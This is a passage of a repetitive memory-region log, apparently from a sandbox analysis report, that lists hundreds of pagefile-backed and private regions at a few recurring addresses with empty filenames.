= pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12710 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12711 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12712 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12713 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 12714 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12715 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12716 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12717 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12718 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12719 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12720 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12721 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12722 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12723 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12724 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12725 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12726 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12727 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12728 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12729 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 12730 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12731 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12732 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12733 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12734 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12735 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12736 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12737 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12738 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12739 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12740 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12741 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12742 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12743 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12744 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12745 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12746 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12747 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12748 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12749 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12750 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12751 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12752 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12753 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12754 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12755 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12756 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12757 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12758 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12759 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12760 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12761 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12762 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12763 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12764 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12765 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12766 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12767 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 12768 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12769 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12770 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12771 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12772 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12773 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12774 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12775 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12776 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12777 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12778 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12779 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12780 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12781 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12782 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12783 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12784 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12785 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12786 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12787 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12788 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12789 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12790 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12791 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12792 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12793 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12794 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12795 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12796 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12797 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12798 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12799 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12800 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12801 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12802 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12803 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12804 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12805 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12806 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12807 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12808 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12809 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12810 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12811 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12812 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12813 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12814 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12815 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12816 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12817 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12818 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12819 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12820 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12821 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12822 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12823 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12824 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12825 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12826 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12827 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12828 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12829 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12830 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12831 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12832 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12833 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12834 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12835 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12836 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12837 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12838 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12839 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12840 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12841 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12842 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12843 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12844 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12845 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12846 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12847 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12848 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12849 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12850 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12851 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12852 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12853 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12854 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12855 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12856 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12857 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12858 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12859 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12860 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12861 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12862 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12863 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12864 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12865 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12866 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12867 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12868 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 12869 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12870 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12871 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12872 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12873 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12874 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12875 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12876 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12877 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12878 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12879 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12880 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12881 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12882 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12883 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12884 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12885 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12886 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12887 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12888 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12889 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12890 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12891 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12892 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12893 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12894 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12895 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12896 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12897 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 